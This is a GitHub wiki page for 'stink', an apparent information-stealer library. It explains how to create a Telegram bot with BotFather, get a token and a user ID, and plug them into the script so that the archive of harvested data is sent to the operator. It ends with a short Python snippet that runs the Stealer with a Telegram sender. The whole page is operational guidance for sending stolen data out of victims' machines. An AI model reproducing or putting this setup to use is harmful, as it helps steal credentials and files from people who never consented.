Telegram bot - FallenAstaroth/stink GitHub Wiki

Introduction

A guide on how to set up data sending via the Telegram bot.

Getting token

  1. Open a chat with BotFather.
  2. Write the command /newbot.

image

  1. Write the name of the bot, then the nickname with the attribute _bot at the end.

image

  1. Insert the resulting token into the YOUR_TOKEN field in the script.

Getting id

  1. Open a chat with Get My ID.
  2. Write the command /start.

image

  1. Insert the resulting ID into the YOUR_ID field in the script.

After that, you need to write any message to the bot, so he can send you the archive.

Example usage

from stink import Stealer, Senders

if __name__ == '__main__':
    Stealer(senders=[Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID)]).run()